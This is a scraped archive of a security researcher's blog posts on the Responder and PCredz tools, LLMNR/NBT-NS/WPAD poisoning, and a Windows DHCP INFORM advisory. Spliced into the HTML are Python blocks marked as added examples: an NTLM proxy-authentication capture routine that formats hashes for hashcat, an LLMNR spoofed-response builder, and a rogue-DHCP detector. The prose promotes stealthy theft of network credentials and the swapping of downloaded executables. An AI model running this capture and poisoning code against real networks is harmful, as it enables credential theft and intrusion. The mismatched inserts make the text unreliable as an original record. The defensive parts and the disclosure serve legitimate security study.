NAC, IDS, IPS vendors might receive ready-to-go signatures for a fairly low price on a case-by-case review; I don't want any of this ending up in any gov's hands before a patch is out. Therefore, selected security vendors will be able to protect their users from critical 0day attacks several months before Microsoft finally decides to protect them by releasing the actual patch.<br />
<br />
I invite any frequent MSRC submitter to join me, if they feel like MSFT or any other high profile vendor is sitting on their bugs, it can also be hosted here or published in the same way on their websites.<br />
<br />
Users win, you win, I win.<br />
<br />
GPG public key: AD0D 60A7 FDAE 1443 F439 D6B1 8DA2 BA12 402E 6A77 </div>
Laurent Gaffié bloghttp://www.blogger.com/profile/08377956323092605195noreply@blogger.com0tag:blogger.com,1999:blog-3247452330105635425.post-18877033016912154982016-09-11T20:27:00.001-07:002016-09-12T05:07:58.256-07:00 Introducing Proxy Auth on Responder 2.3.2<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: left;">
Few days ago <a href="https://twitter.com/mubix" target="_blank">mubix</a> submitted a <a href="https://github.com/lgandx/Responder/issues/1" target="_blank">feature request </a>on <a href="https://github.com/lgandx/Responder/" target="_blank">Responder repository</a>. </div>
I liked the idea and I started working on it. The concept was to force authentication while a victim would use the WPAD proxy server, but then comes the question: why authenticate someone on the proxy when the -F option already forces authentication for the wpad.dat file retrieval?<br />
<br />
Why not let anyone get the wpad.dat configuration file for free, with no authentication, and then use another proxy server (not the WPAD server) to force authentication, so that Responder doesn't send an HTTP 401 response but a 407 Proxy Authentication Required, and then drop the connection.<br />
<br />
<div style="text-align: left;">
Thanks to PAC files, you can set fail-over proxy servers:</div>
<div style="text-align: left;">
<br /></div>
<blockquote class="tr_bq">
function FindProxyForURL(url, host)<br />
{<br />
&nbsp;&nbsp;&nbsp;&nbsp;if ((host == "localhost") || shExpMatch(host, "localhost.*") || (host == "127.0.0.1") || isPlainHostName(host))<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return "DIRECT";<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;if (dnsDomainIs(host, "RespProxySrv") || shExpMatch(host, "(*.RespProxySrv|RespProxySrv)"))<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return "DIRECT";<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;return 'PROXY 10.10.100.10:3128; PROXY 10.10.100.20:3141; DIRECT';<br />
}</blockquote>
<br />
<div style="text-align: left;">
</div>
<div style="text-align: left;">
<div style="text-align: left;">
<b>The last line means: </b></div>
<br />
If the proxy server 10.10.100.10:3128 fails, then use this one: 10.10.100.20:3141 and if both fails, use a direct connection to the intranet or internet.<br />
<br />
Using this functionality, we can make sure the WPAD server is not working -by not using the -w option- then any workstation using our PAC file will:</div>
<ul style="text-align: left;">
<li>Connect to 10.10.100.10:3128 and send a request with URL, cookies, headers.</li>
</ul>
<ul style="text-align: left;">
<li>The Auth-Proxy module will respond with a 407 and request credentials.<br /> </li>
<li>The workstation will transparently send its NTLMv1/NTLMv2 challenge-response (the encrypted credentials) and will get a TCP reset from the proxy server right after that. <br /> </li>
<li>This is done with SO_LINGER (l_onoff=1, l_linger=0), which makes close() send a RST instead of a normal FIN, faking a proxy server failure.</li>
</ul>
<ul style="text-align: left;">
<li>The workstation will then attempt the second proxy server 10.10.100.20:3141 which is offline.</li>
</ul>
<ul style="text-align: left;">
<li>Finally the workstation will connect to the internet directly.</li>
</ul>
<br />
The user behind his desk using Internet Explorer has seen nothing and has internet access, we get his NTLM credentials.<br />
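The exchange in the list above at the wire level, as an added example that is not Responder's code: the 407 we answer with, the SO_LINGER setting that turns close() into a RST, and a parser that takes the client's Proxy-Authorization: NTLM header, bounds-checks the AUTHENTICATE_MESSAGE fields (layout per MS-NLMP) and emits the NetNTLMv1/NetNTLMv2 line hashcat expects (modes 5500/5600, the same layout Responder writes to its capture files). The sample message, the server challenge, the cp437 choice for OEM-encoded strings and the fact that the header carries a bare NTLM token rather than a SPNEGO-wrapped Negotiate one are all assumptions of this example.

```python
"""Added example: 407 challenge, RST-on-close, and AUTHENTICATE_MESSAGE parsing.

Not Responder's code. The sample message is constructed, not captured.
"""
import base64
import socket
import struct
from typing import Any, Dict

NTLMSSP_NEGOTIATE_UNICODE = 0x00000001
SAMPLE_SERVER_CHALLENGE = bytes.fromhex("1122334455667788")  # constructed


def proxy_auth_required() -> bytes:
    """Server side of the exchange: an empty 407 offering NTLM."""
    return (b"HTTP/1.1 407 Proxy Authentication Required\r\n"
            b"Proxy-Authenticate: NTLM\r\n"
            b"Connection: keep-alive\r\n"
            b"Content-Length: 0\r\n\r\n")


def linger_rst(sock: socket.socket) -> None:
    """SO_LINGER with l_onoff=1, l_linger=0: close() sends a RST instead of a
    FIN, so the client treats the proxy as failed and moves to the next one."""
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack("ii", 1, 0))


def _field(data: bytes, offset: int) -> bytes:
    return struct.pack("<HHI", len(data), len(data), offset)


def build_authenticate(domain: str, user: str, workstation: str,
                       lm_response: bytes, nt_response: bytes,
                       flags: int = NTLMSSP_NEGOTIATE_UNICODE) -> bytes:
    """Constructed AUTHENTICATE_MESSAGE (MS-NLMP 2.2.1.3): 88-byte header
    (signature, type, six len/maxlen/offset fields, flags, version, MIC)
    followed by the payload. Used only to produce a test vector."""
    items = [lm_response, nt_response, domain.encode("utf-16-le"),
             user.encode("utf-16-le"), workstation.encode("utf-16-le"), b""]
    fields, payload = b"", b""
    for item in items:
        fields += _field(item, 88 + len(payload))
        payload += item
    return (b"NTLMSSP\x00" + struct.pack("<I", 3) + fields
            + struct.pack("<I", flags) + bytes(8) + bytes(16) + payload)


def parse_authenticate(msg: bytes) -> Dict[str, Any]:
    """Extract the fields needed for cracking. Every offset/length pair is
    bounds-checked so a malformed client message cannot read out of range."""
    if len(msg) < 64 or msg[:8] != b"NTLMSSP\x00" or struct.unpack_from("<I", msg, 8)[0] != 3:
        raise ValueError("not an NTLM AUTHENTICATE_MESSAGE")

    def field(at: int) -> bytes:
        length, _maxlen, offset = struct.unpack_from("<HHI", msg, at)
        if offset + length > len(msg):
            raise ValueError("field points outside the message")
        return msg[offset:offset + length]

    flags = struct.unpack_from("<I", msg, 60)[0]
    enc = "utf-16-le" if flags & NTLMSSP_NEGOTIATE_UNICODE else "cp437"  # OEM code page assumed
    return {"lm_response": field(12), "nt_response": field(20),
            "domain": field(28).decode(enc), "user": field(36).decode(enc),
            "workstation": field(44).decode(enc), "flags": flags}


def from_proxy_authorization(header_value: str) -> bytes:
    """'Proxy-Authorization: NTLM <base64>' value -> raw NTLMSSP bytes."""
    scheme, _, token = header_value.strip().partition(" ")
    if scheme.upper() != "NTLM":
        raise ValueError("only bare NTLM tokens handled here (Negotiate may be SPNEGO-wrapped)")
    return base64.b64decode(token)


def to_hashcat(auth: Dict[str, Any], server_challenge: bytes) -> str:
    """NetNTLMv1 -> hashcat -m 5500 (user::domain:lm:nt:challenge),
    NetNTLMv2 -> -m 5600 (user::domain:challenge:NTProofStr:blob)."""
    user, domain = auth["user"], auth["domain"]
    lm, nt = auth["lm_response"], auth["nt_response"]
    if len(nt) == 24:
        return f"{user}::{domain}:{lm.hex()}:{nt.hex()}:{server_challenge.hex()}"
    if len(nt) > 24:
        return f"{user}::{domain}:{server_challenge.hex()}:{nt[:16].hex()}:{nt[16:].hex()}"
    raise ValueError("unexpected NtChallengeResponse length")


def sample_header() -> str:
    """Constructed client header for a lab run (not a real capture)."""
    nt_v2 = bytes.fromhex("aa" * 16 + "0101000000000000" + "bb" * 8)  # NTProofStr + blob
    msg = build_authenticate("SMB3", "lgandx", "DESKTOP-123", bytes(24), nt_v2)
    return "NTLM " + base64.b64encode(msg).decode("ascii")


if __name__ == "__main__":
    auth = parse_authenticate(from_proxy_authorization(sample_header()))
    print(to_hashcat(auth, SAMPLE_SERVER_CHALLENGE))
```

The server challenge in the output is the one we put in our own CHALLENGE_MESSAGE, so a capture file is only useful if the challenge is recorded next to the response; that is why Responder lets you set a custom NETNTLM challenge.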
<br />
This attack is highly effective and is included in the latest version 2.3.2:<br />
<br />
https://github.com/lgandx/Responder/<br />
<br />
This video demonstrates the concept on a 2012R2 PDC with default settings, someone simply open IE, Responder gets the credentials transparently, no password prompt:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe width="320" height="266" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/mgAHX4h1ojI/0.jpg" src="https://www.youtube.com/embed/mgAHX4h1ojI?feature=player_embedded" frameborder="0" allowfullscreen></iframe></div>
<br /> </div>
Laurent Gaffié bloghttp://www.blogger.com/profile/08377956323092605195noreply@blogger.com1tag:blogger.com,1999:blog-3247452330105635425.post-36011700184373753462015-09-30T02:57:00.001-07:002015-09-30T02:57:28.561-07:00<div dir="ltr" style="text-align: left;" trbidi="on">
<b>Demystifying Responder WPAD Authentication module:</b><br /><br />One of the most successful modules in Responder is the WPAD server.<br />
<br />The WPAD functionality can be boiled down this way, there's two issues: <br />
<ul style="text-align: left;">
<li><b>WPAD MITM:</b> Anyone on an ISP (like qc.ca) plugged directly into the modem (WAN), and therefore on the internet, is vulnerable if someone registers a wpad.qc.ca domain and serves a wpad.dat file to the people looking for it.</li>
</ul>
The Web Proxy Autodiscovery Protocol looks for WPAD.domain.name through DNS by default; if there's no answer it falls back to multicast LLMNR, and if that fails it goes to broadcast NBT-NS.<ul>
<li><b> WPAD file retrieval: </b>Responder exploits the fact that the Web Proxy Autodiscovery Protocol allows and supports HTTP authentication. Therefore, if a workstation is looking for "WPAD" via LLMNR or NBT-NS and someone answers it (multicast/broadcast) with a rogue HTTP authentication server, that workstation transparently sends its set of credentials. </li>
</ul>
If a workstation boots up, the machine account credentials will be sent. If a user opens IE on that workstation, Responder gets the encrypted set of credentials (the NTLM challenge-response) transparently, with no user interaction and no logs. Therefore, no logs no crime, right?<br />What I just described is the stealthiest way of exploiting and getting encrypted sets of credentials from any workstation ranging from Windows 2000 to 2012R2.</div>
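The LLMNR leg of the fallback chain described above, at the packet level, as an added example that is not Responder's code: what a workstation looking for "wpad" multicasts (RFC 4795, UDP 5355 to 224.0.0.252 or ff02::1:3), how to parse such a packet, and what a positive answer looks like. The name, the address and the transaction ID are constructed for this illustration; the parser is the part worth keeping, since it is what Responder's analyze mode and any LLMNR detection need.

```python
"""Added example: LLMNR query/response encoding and parsing (RFC 4795).

Not Responder's code. Packets here are constructed and never sent.
"""
import socket
import struct
from typing import Any, Dict, Tuple

LLMNR_PORT = 5355
LLMNR_MCAST_V4 = "224.0.0.252"   # RFC 4795 link-scope multicast group
LLMNR_MCAST_V6 = "ff02::1:3"
FLAG_QR, FLAG_C, FLAG_TC, FLAG_T = 0x8000, 0x0400, 0x0200, 0x0100
RCODE_MASK = 0x000F


def encode_name(name: str) -> bytes:
    """DNS-style labels: length-prefixed, terminated by a zero octet."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("utf-8")
        if not 0 < len(raw) < 64:
            raise ValueError("label length must be 1..63")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def decode_name(pkt: bytes, pos: int) -> Tuple[str, int]:
    """Decode labels at pos, following compression pointers with a hop limit.
    Returns (name, offset just past the name field in the original stream)."""
    labels, end, jumped, hops = [], pos, False, 0
    while True:
        if pos >= len(pkt):
            raise ValueError("truncated name")
        ln = pkt[pos]
        if ln & 0xC0 == 0xC0:                       # pointer to an earlier name
            if pos + 1 >= len(pkt):
                raise ValueError("truncated pointer")
            if not jumped:
                end = pos + 2
            jumped, hops = True, hops + 1
            if hops > 16:
                raise ValueError("pointer loop")
            pos = struct.unpack_from(">H", pkt, pos)[0] & 0x3FFF
            continue
        pos += 1
        if ln == 0:
            break
        labels.append(pkt[pos:pos + ln].decode("utf-8", "replace"))
        pos += ln
    return ".".join(labels), (end if jumped else pos)


def build_llmnr_query(name: str, qtype: int = 1, txid: int = 0x1234) -> bytes:
    """Standard query: QR=0, one question, class IN."""
    header = struct.pack(">HHHHHH", txid, 0, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack(">HH", qtype, 1)


def parse_llmnr(pkt: bytes) -> Dict[str, Any]:
    """Parse header, questions and answers; A rdata is decoded to dotted quad."""
    if len(pkt) < 12:
        raise ValueError("short packet")
    txid, flags, qd, an, _ns, _ar = struct.unpack_from(">HHHHHH", pkt, 0)
    pos, questions, answers = 12, [], []
    for _ in range(qd):
        name, pos = decode_name(pkt, pos)
        if pos + 4 > len(pkt):
            raise ValueError("truncated question")
        qtype, qclass = struct.unpack_from(">HH", pkt, pos)
        pos += 4
        questions.append({"name": name, "type": qtype, "class": qclass})
    for _ in range(an):
        name, pos = decode_name(pkt, pos)
        if pos + 10 > len(pkt):
            raise ValueError("truncated resource record")
        rtype, rclass, ttl, rdlen = struct.unpack_from(">HHIH", pkt, pos)
        pos += 10
        rdata = pkt[pos:pos + rdlen]
        if len(rdata) != rdlen:
            raise ValueError("truncated rdata")
        pos += rdlen
        rec: Dict[str, Any] = {"name": name, "type": rtype, "class": rclass, "ttl": ttl, "rdata": rdata}
        if rtype == 1 and rdlen == 4:
            rec["address"] = socket.inet_ntoa(rdata)
        answers.append(rec)
    return {"id": txid, "is_response": bool(flags & FLAG_QR),
            "conflict": bool(flags & FLAG_C), "truncated": bool(flags & FLAG_TC),
            "tentative": bool(flags & FLAG_T), "rcode": flags & RCODE_MASK,
            "questions": questions, "answers": answers}


def build_llmnr_response(query: bytes, ipv4: str, ttl: int = 30) -> bytes:
    """Positive answer to a single A query: echo id and question, add one A
    record. A host that answers every name this way is what analyze mode
    lets you watch for without poisoning anything yourself."""
    q = parse_llmnr(query)
    if q["is_response"] or len(q["questions"]) != 1 or q["questions"][0]["type"] != 1:
        raise ValueError("expected a single A-record query")
    question = q["questions"][0]
    qname = encode_name(question["name"])
    header = struct.pack(">HHHHHH", q["id"], FLAG_QR, 1, 1, 0, 0)
    answer = qname + struct.pack(">HHIH", 1, 1, ttl, 4) + socket.inet_aton(ipv4)
    return header + qname + struct.pack(">HH", 1, question["class"]) + answer


if __name__ == "__main__":
    query = build_llmnr_query("wpad")
    print(parse_llmnr(query))
    print(parse_llmnr(build_llmnr_response(query, "10.10.100.10")))
```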
Laurent Gaffié bloghttp://www.blogger.com/profile/08377956323092605195noreply@blogger.com0tag:blogger.com,1999:blog-3247452330105635425.post-58556253824703779372014-06-09T22:38:00.001-07:002014-06-09T22:38:40.656-07:00Responder v2.0.9<div dir="ltr" style="text-align: left;" trbidi="on">
Responder is an Active Directory/Windows environment takeover tool suite that can stealthily take over any default active directory environment (including Windows 2012) in minutes or hours. Most of the attacks in this tool are hard to detect and are highly successful.<br /><br />Responder attacks 5 Windows core protocols:<br /> - LLMNR Poisoning (Windows >=vista).<br /> - Netbios Name Service Poisoning (NBT-NS poisoning, any by default).<br /> - WPAD (Any by default).<br /> - ICMP Redirect (Windows <=2003/XP).<br /> - DHCP INFORM (Windows <=2003/XP) and ability to perform normal DHCP attacks (Linux, OSX, Windows) [unicast answer].<br /><br />An extra protocol has been added, for OSX and Linux distributions using avahi: MDNS (Linux, Apple, any .local)<br /><br />When exploiting these protocol flaws, Responder has its own rogue servers listening:<br />- SMB Auth server. Supports NTLMv1, NTLMv2 hashes with Extended Security NTLMSSP by default. Successfully tested from Windows 95 to Server 2012 RC, Samba and Mac OSX Lion. Clear text password is supported for NT4, and LM hashing downgrade when the --lm option is set. This functionality is enabled by default when the tool is launched.<br /><br />- MSSQL Auth server. In order to redirect SQL Authentication to this tool, you will need to set the option -r (NBT-NS queries for SQL Server lookup are using the Workstation Service name suffix) for systems older than windows Vista (LLMNR will be used for Vista and higher). This server supports NTLMv1, LMv2 hashes. This functionality was successfully tested on Windows SQL Server 2005 & 2008.<br /><br />- HTTP Auth server. In order to redirect HTTP Authentication to this tool, you will need to set the option -r for Windows versions older than Vista (NBT-NS queries for HTTP server lookup are sent using the Workstation Service name suffix). For Vista and higher, LLMNR will be used. This server supports NTLMv1, NTLMv2 hashes and Basic Authentication. 
This server was successfully tested on IE 6 to IE 10, Firefox, Chrome, Safari. Note: This module also works for WebDav NTLM authentication issued from Windows WebDav clients (WebClient). You can also send your custom files to a victim.<br /><br />- HTTPS Auth server. In order to redirect HTTPS Authentication to this tool, you will need to set the -r option for Windows versions older than Vista (NBT-NS queries for HTTP server lookups are sent using the Workstation Service name suffix). For Vista and higher, LLMNR will be used. This server supports NTLMv1, NTLMv2, and Basic Authentication. This server was successfully tested on IE 6 to IE 10, Firefox, Chrome, and Safari. The folder Cert/ was added. It contains 2 default keys, including a dummy private key. This is intentional. The purpose is to have Responder working out of the box. A script was added in case you need to generate your own self-signed key pair.<br /><br />- LDAP Auth server. In order to redirect LDAP Authentication to this tool, you will need to set the option -r for Windows versions older than Vista (NBT-NS queries for HTTP server lookup are sent using the Workstation Service name suffix). For Vista and higher, LLMNR will be used. This server supports NTLMSSP hashes and Simple Authentication (clear text authentication). This server was successfully tested on Windows Support tool "ldp" and LdapAdmin.<br /><br />- FTP Auth server. This module will collect FTP clear text credentials.<br /><br />- Kerberos v5 pre-auth server.<br /><br />- Small DNS server. This server will answer type A queries. This is really handy when it's combined with ARP spoofing, ICMP Redirect, DHCP INFORM.<br /><br />- WPAD rogue transparent proxy server. This module will capture all HTTP requests from anyone launching Internet Explorer on the network. This module is highly effective. You can send your custom PAC script to a victim and inject HTML into the server's responses. 
See Responder.conf.<br /><br />- Analyze mode: This module allows you to see NBT-NS, BROWSER and LLMNR requests between systems without poisoning any requests. You can also map domains, MSSQL servers, workstations passively and also see if ICMP Redirects attacks are plausible on your subnet. No port scans.<br /><br />- POP3 auth server. This module will collect POP3 plaintext credentials<br /><br />- SMTP auth server. This module will collect PLAIN/LOGIN clear text credentials.<br /><br />- IMAP auth server.<br />
<br />
Responder also lets you:<br /><br />- Customize your penetration test via Responder.conf.<br />- Respond to specific in-scope Netbios/LLMNR names.<br />- Respond to specific in-scope IP addresses.<br />- Inject SMB share pictures into WPAD responses.<br />- Replace requested .exe files with your own, but shown as the original one requested.<br />- Replace any requested page with your custom HTML page, exe file, etc (S-E).<br />- Set your custom NETNTLM challenge.<br /><br />- Logs all its activity to a file: Responder-Session.log.<br />- All hashes are printed to stdout and dumped in a unique hashcat-compliant file using this format: (SMB or MSSQL or HTTP)-(ntlm-v1 or v2 or clear-text)-Client_IP.txt. The file will be located in the current folder.<br />- When the option -f is set, Responder will fingerprint every host that issued an LLMNR/NBT-NS query. All capture modules still work while in fingerprint mode.<br /><br />Usage example:<br />./Responder.py -i Your_IP_Address -rvF<br />Use NBT-NS workstation redirects, be verbose, force WPAD file retrieval authentication<br /><br />./Responder.py -i Your_IP_Address -A<br />Analyze mode shows NBT-NS/LLMNR/MDNS queries without responding, finds all MSSQL servers, workstations and domains, and prints whether you can ICMP-Redirect on the subnet. Passive reconnaissance at its best. No port scan; map a network within minutes.<br /><br />Github:<br />https://github.com/Spiderlabs/Responder<br /><br />More info:<br />- https://github.com/SpiderLabs/Responder/blob/master/README.md<br />- http://blog.spiderlabs.com/2012/10/introducing-responder-10.html<br />- http://blog.spiderlabs.com/2013/01/owning-windows-networks-with-responder-17.html<br />- http://blog.spiderlabs.com/2013/02/owning-windows-network-with-responder-part-2.html<br />- http://blog.spiderlabs.com/2014/02/responder-20-owning-windows-networks-part-3.html<br /><br />Twitter:<br />- https://twitter.com/PythonResponder</div>
<h3>More on PCredz.. (2014-06-07)</h3><div dir="ltr" style="text-align: left;" trbidi="on">
Pcredz was designed to dump useful information on the fly, from a pcap file or from a pcap directory.<br />
Unlike tools such as Breachprobe, Pcredz is highly effective and fast, built to meet your pentest needs.<br />
<br />
What Pcredz does right now from a live interface or pcap file: <br />
<ul>
<li>Identify Card Holder Data (CHD) on any port.</li>
<li>Dump NTLMv1/v2 (DCE-RPC, SMBv1/2, LDAP, MSSQL, HTTP, etc) hashes on any protocol and port.</li>
<li>Dump Kerberos (AS-REQ Pre-Auth etype 23) hashes (TCP/UDP 88).</li>
<li>Dump HTTP Basic (any port).</li>
<li>Dump POP credentials.</li>
<li>Dump SMTP credentials.</li>
<li>Dump IMAP credentials.</li>
<li>Dump SNMP community strings.</li>
<li>Dump FTP credentials.</li>
</ul>
All hashes are displayed in hashcat format (use -m 7500 for kerberos, -m 5500 for NTLMv1, -m 5600 for NTLMv2).<br />All credentials are logged to a file (CredentialDump-Session.log).<br />
<br />
Pcredz was designed to be highly efficient, specifically with ARP poisoning attacks.<br />
More details and download link:<br />Github: <a href="https://github.com/lgandx/PCredz/" target="_blank">https://github.com/lgandx/PCredz/</a></div>
<h3>Microsoft DHCP INFORM Configuration Overwrite (2014-05-28)</h3><div dir="ltr" style="text-align: left;" trbidi="on">
Title: Microsoft DHCP INFORM Configuration Overwrite<br />
Version: 1.0<br />
Issue type: Protocol Security Flaw<br />
Affected vendor: Microsoft<br />
Release date: 28/05/2014<br />
Discovered by: Laurent Gaffié<br />
Advisory by: Laurent Gaffié<br />
Issue status: Patch not available<br />
==============================<br />
<div dir="ltr">
=================================================<br />
<br />
Summary<br />
-------<br />
<br />
A vulnerability in Windows DHCP (<a href="http://www.ietf.org/rfc/rfc2131.txt" target="_blank">http://www.ietf.org/rfc/rfc2131.txt</a>) was found on Windows OS versions ranging from Windows 2000 through to Windows Server 2003. This vulnerability allows an attacker to remotely overwrite DNS, Gateway, IP Addresses, routing, WINS server, WPAD, and server configuration with no user interaction. Successful exploitation of this issue will result in a remote network configuration overwrite. Microsoft acknowledged the issue but has indicated no plans to publish a patch to resolve it.<br />
<br />
<br />
Technical details<br />
-----------------<br />
<br />
Windows 2003/XP machines send periodic DHCP INFORM requests and do not check whether the DHCP INFORM answer (DHCP ACK) comes from the registered DHCP server/relay server. Any local system may respond to these requests and overwrite a Windows 2003/XP network configuration by sending a properly formatted unicast reply.<br />
<br />
Impact<br />
------<br />
<br />
Successful attempts will overwrite DNS, WPAD, WINS, gateway, and/or routing settings on the target system.<br />
<br />
Affected products<br />
-----------------<br />
<br />
Windows:<br />
- 2000<br />
- XP<br />
- 2003<br />
<br />
Proof of concept<br />
----------------<br />
The DHCP.py utility found within the Responder toolkit can be used to exploit this vulnerability.<br />
<br />
git clone <a href="https://github.com/Spiderlabs/Responder" target="_blank">https://github.com/Spiderlabs/Responder</a><br />
<br />
Solution<br />
--------<br />
Set a DWORD registry key "UseInform" to "0" in each subfolder found in HKLM\SYSTEM\CCS\Services\TCP\Interfaces\<br />
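The missing check described above (is the DHCPACK answering my DHCPINFORM really from the registered server?) is easy to express on the wire. As an added defender-side example, not part of this advisory or of the Responder toolkit, the following Python parses DHCP messages per RFC 2131 and flags an ACK that matches an outstanding INFORM transaction ID but comes from, or names as server identifier, an address outside the registered DHCP server list, listing which configuration options it would have overwritten. The addresses, MAC, transaction ID and WPAD URL are constructed sample values.

```python
import struct
from ipaddress import IPv4Address

MAGIC_COOKIE = b"\x63\x82\x53\x63"
HEADER_FMT = "!BBBBIHH4s4s4s4s16s64s128s"   # RFC 2131 fixed-length part (236 bytes)
OPT_ROUTER, OPT_DNS, OPT_STATIC_ROUTE, OPT_WINS = 3, 6, 33, 44
OPT_MSG_TYPE, OPT_SERVER_ID, OPT_CLASSLESS_ROUTE, OPT_WPAD = 53, 54, 121, 252
DHCPACK, DHCPINFORM = 5, 8
# options a rogue ACK can use to rewrite the client's network configuration
CONFIG_OPTIONS = {OPT_ROUTER: "gateway", OPT_DNS: "DNS servers", OPT_STATIC_ROUTE: "static routes",
                  OPT_WINS: "WINS servers", OPT_CLASSLESS_ROUTE: "classless routes", OPT_WPAD: "WPAD URL"}


def build_dhcp(msg_type, xid, client_mac, ciaddr, options):
    """Constructed DHCP message (sample data, not a capture): fixed header, magic cookie,
    option 53 first, then the given (code, raw value) options, then the end marker."""
    op = 1 if msg_type == DHCPINFORM else 2          # BOOTREQUEST vs BOOTREPLY
    header = struct.pack(HEADER_FMT, op, 1, 6, 0, xid, 0, 0,
                         IPv4Address(ciaddr).packed, b"\0" * 4, b"\0" * 4, b"\0" * 4,
                         client_mac.ljust(16, b"\0"), b"\0" * 64, b"\0" * 128)
    body = bytes([OPT_MSG_TYPE, 1, msg_type])
    for code, value in options:
        body += bytes([code, len(value)]) + value
    return header + MAGIC_COOKIE + body + b"\xff"


def parse_dhcp(packet):
    """Return op, xid, ciaddr and a {code: raw value} map of the options."""
    fields = struct.unpack(HEADER_FMT, packet[:236])
    if packet[236:240] != MAGIC_COOKIE:
        raise ValueError("missing DHCP magic cookie")
    options, i = {}, 240
    while i < len(packet) and packet[i] != 0xFF:
        if packet[i] == 0x00:                        # pad option
            i += 1
            continue
        code, length = packet[i], packet[i + 1]
        options[code] = packet[i + 2:i + 2 + length]
        i += 2 + length
    return {"op": fields[0], "xid": fields[4],
            "ciaddr": str(IPv4Address(fields[7])), "options": options}


def check_inform_ack(packet, src_ip, pending_inform_xids, registered_servers):
    """Alert when a DHCPACK answering one of the client's outstanding DHCPINFORM
    transactions comes from, or names as server identifier, a host that is not a
    registered DHCP server/relay: the check XP/2003 omit. Returns a list of alerts."""
    msg = parse_dhcp(packet)
    opts = msg["options"]
    if opts.get(OPT_MSG_TYPE) != bytes([DHCPACK]) or msg["xid"] not in pending_inform_xids:
        return []
    origins = {src_ip}
    if OPT_SERVER_ID in opts:
        origins.add(str(IPv4Address(opts[OPT_SERVER_ID])))
    unknown = origins - set(registered_servers)
    if not unknown:
        return []
    pushed = [CONFIG_OPTIONS[c] for c in opts if c in CONFIG_OPTIONS]
    return [f"DHCPACK xid={msg['xid']:#x} to {msg['ciaddr']} from unregistered {sorted(unknown)} "
            f"would overwrite: {', '.join(pushed) or 'nothing'}"]


if __name__ == "__main__":
    REGISTERED = {"10.0.0.1"}                       # constructed: the legitimate DHCP server
    mac = bytes.fromhex("0a1b2c3d4e5f")             # constructed client MAC
    inform = build_dhcp(DHCPINFORM, 0x1234, mac, "10.0.0.50", [])
    pending = {parse_dhcp(inform)["xid"]}
    rogue_ack = build_dhcp(DHCPACK, 0x1234, mac, "10.0.0.50", [
        (OPT_SERVER_ID, IPv4Address("10.0.0.66").packed),
        (OPT_DNS, IPv4Address("10.0.0.66").packed),
        (OPT_WPAD, b"http://10.0.0.66/wpad.dat"),
    ])
    for line in check_inform_ack(rogue_ack, "10.0.0.66", pending, REGISTERED):
        print(line)
```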
<br />
Response timeline<br />
-----------------<br />
* 18/04/2014 - Vendor notified.<br />
* 18/04/2014 - Vendor acknowledges the advisory ( [MSRC]0050886 ).<br />
* 18/04/2014 - Suggested to vendor to run Responder on an A-D environment while looking at the DHCP issue, for education purposes, since multiple attempts were made to make them aware that any A-D environment by default is vulnerable if Responder is running on the subnet. Also, MSRC was asked what code change made this DHCP INFORM issue different on Windows Vista than on Windows Server 2003.<br />
* 21/04/2014 - MSRC answers with an automated response.<br />
* 08/05/2014 - Request for a reply.<br />
* 14/05/2014 - MSRC replies and refuses to share their view on the code change; however, they mention that 'The product team is investigating whether the RFC for a DHCPINFORM message is properly implemented'.<br />
* 14/05/2014 - An email was sent to notify MSRC that no code change was requested, but the logic behind it. Also, MSRC was asked if they were successful with Responder.<br />
* 16/05/2014 - MSRC closes [MSRC]0050886 and doesn't provide any info on whether they were successful with Responder in their environment.<br />
<br />
<br />
References<br />
----------<br />
* Responder: <a href="https://github.com/Spiderlabs/Responder" target="_blank">https://github.com/Spiderlabs/Responder</a><br />
* <a href="https://twitter.com/PythonResponder" target="_blank">https://twitter.com/PythonResponder</a><br />
* <a href="http://blog.spiderlabs.com/2014/02/responder-20-owning-windows-networks-part-3.html" target="_blank">http://blog.spiderlabs.com/2014/02/responder-20-owning-windows-networks-part-3.html</a></div>
</div>
<h3>Breaking MSFT Kerberos With Responder (2014-04-09)</h3><div dir="ltr" style="text-align: left;" trbidi="on">
I've been working on a way to get MS Kerberos v5 hashes via the Browser protocol automatically, with no user interaction, on a given network.<br />
(click on the pics if they don't display correctly).<br />
<br />
Often you see these requests in wireshark on an internal penetration test:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRgYVaM89-1EImSiDKh1phKA3Rp4ifcQxrEieav9bpQJXVREfEv15gL0Malg_nh2F7KwgEFHJeYVhjEZRcZgoeyqGza0z_PHK_0YGy-bWevYsHIFvDHsRUe37PsHoKCBhWrpiAop8kd2M/s1600/sam-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRgYVaM89-1EImSiDKh1phKA3Rp4ifcQxrEieav9bpQJXVREfEv15gL0Malg_nh2F7KwgEFHJeYVhjEZRcZgoeyqGza0z_PHK_0YGy-bWevYsHIFvDHsRUe37PsHoKCBhWrpiAop8kd2M/s1600/sam-2.png" height="36" width="640" /></a></div>
<br />
So I came up with a tool that automates the Kerberos connection for these:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
